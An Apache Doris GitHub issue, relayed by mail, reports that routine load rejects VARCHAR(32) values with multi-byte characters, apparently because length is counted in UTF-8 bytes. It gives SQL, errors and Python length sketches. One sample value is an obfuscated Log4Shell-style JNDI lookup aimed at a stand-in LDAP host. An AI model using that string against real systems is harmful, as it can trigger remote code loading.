123shang60 opened a new issue, #64334:
URL: https://github.com/apache/doris/issues/64334

   ### Search before asking
   
   - [x] I had searched in the 
[issues](https://github.com/apache/doris/issues?q=is%3Aissue) and found no 
similar issues.
   
   
   ### Version
   
   doris-4.1.0-rc03-5960d4cea0e
   
   ### What's Wrong?
   
   I created the following table in Doris:
   ```sql
   CREATE TABLE test_table
   (
       `env` VARCHAR(32) NOT NULL DEFAULT ''
   )
   ENGINE = OLAP
   DUPLICATE KEY(env)
   DISTRIBUTED BY RANDOM BUCKETS 1
   properties(
       "compression" = "zstd",
       "enable_single_replica_compaction" = "true",
       "replication_allocation" = "tag.location.default: 1",
       "storage_format" = "V3"
   );
   ```
   
   I also started a routine load job:
   ```sql
   CREATE ROUTINE LOAD dwd.test_table ON test_table
   COLUMNS(`env`)
   PROPERTIES(
       "format"="json",
       "strict_mode"="false",
       "max_filter_ratio" = "1",
       "timezone" = "Asia/Shanghai",
       "max_error_number" = "5000000",
       "max_batch_interval" = "10",
       "max_batch_rows" = "5000000",
       "desired_concurrent_number" = "8",
       "load_to_single_tablet" = "true",
       "exec_mem_limit" = "8589934592"
   )
   FROM KAFKA(
       "kafka_broker_list" = "127.0.0.1:9092",
       "kafka_topic" = "test_load",
       "property.kafka_default_offsets" = "OFFSET_END",
       "property.group.id" = "test_load_doris"
   );
   ```
   
   Then I sent the following message to Kafka:
   ```json
   {"env":"${jnd${upper:ı}:ldap://test.comxxxxxx}"}
   ```
   
   In this JSON, `upper:` is followed by the special character `U+0131`. The Doris routine load job then fails with the following error:
   ```
   Reason: column_name[env], the length of input is too long than schema. first 32 bytes of input str: [${jnd${upper:ı}:ldap://test.com] schema length: 32; actual length: 33; . src line []; 
   ```
   
   Similarly, loading the following value, which contains a Chinese character, also fails:
   ```json
   {"env":"中123456789012345678901234567890"}
   ```
   
   The error is:
   ```
   Reason: column_name[env], the length of input is too long than schema. first 32 bytes of input str: [中12345678901234567890123456789] schema length: 32; actual length: 33; . src line []; 
   ```
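
Both messages mention "first 32 bytes", which suggests the `VARCHAR(32)` limit is checked against the UTF-8 byte length rather than the character count. The Python sketch below only measures the two payloads from this report. It does not reproduce Doris's internal check, and the helper name `lengths` is made up for illustration.

```python
from typing import Tuple

# Assumption: the load path compares the UTF-8 byte length of the value
# against the VARCHAR(32) limit. This only measures the two payloads.

def lengths(value: str) -> Tuple[int, int]:
    """Return (number of code points, number of UTF-8 bytes)."""
    return len(value), len(value.encode("utf-8"))

dotless_i = "${jnd${upper:\u0131}:ldap://test.comxxxxxx}"  # U+0131 takes 2 bytes
chinese = "\u4e2d123456789012345678901234567890"            # U+4E2D takes 3 bytes

for name, value in (("dotless_i", dotless_i), ("chinese", chinese)):
    chars, nbytes = lengths(value)
    print(f"{name}: {chars} characters, {nbytes} UTF-8 bytes")
```

The second payload is 31 characters but 33 UTF-8 bytes, which matches the reported `actual length: 33`. The first payload is 38 characters and 39 bytes. Its first 32 characters encode to 33 bytes, which would match the reported value if the input had been cut to 32 characters before the check, but that is a guess and not something the error message confirms.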
   
   ### What You Expected?
   
   The string should be truncated correctly to the length defined for the VARCHAR column, and the data should load successfully.
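
As an illustration of the expected behavior, here is a minimal Python sketch of byte-limited truncation that never splits a multi-byte UTF-8 character. It assumes the limit is counted in UTF-8 bytes. The function `truncate_utf8` is hypothetical and is not Doris code.

```python
def truncate_utf8(value: str, max_bytes: int) -> str:
    """Cut value to at most max_bytes UTF-8 bytes without splitting a character."""
    encoded = value.encode("utf-8")
    if len(encoded) <= max_bytes:
        return value
    # The input is valid UTF-8, so only the tail of the slice can be an
    # incomplete sequence; errors="ignore" drops that partial character.
    return encoded[:max_bytes].decode("utf-8", errors="ignore")


payloads = [
    "${jnd${upper:\u0131}:ldap://test.comxxxxxx}",
    "\u4e2d123456789012345678901234567890",
]
for payload in payloads:
    cut = truncate_utf8(payload, 32)
    print(cut, len(cut.encode("utf-8")))
```

With a limit of 32 bytes, both payloads from this report are cut to exactly the prefixes shown in the error messages. If the cut lands inside a multi-byte character, the result is shorter than the limit rather than corrupted.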
   
   ### How to Reproduce?
   
   _No response_
   
   ### Anything Else?
   
   _No response_
   
   ### Are you willing to submit PR?
   
   - [ ] Yes I am willing to submit a PR!
   
   ### Code of Conduct
   
   - [x] I agree to follow this project's [Code of 
Conduct](https://www.apache.org/foundation/policies/conduct)
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

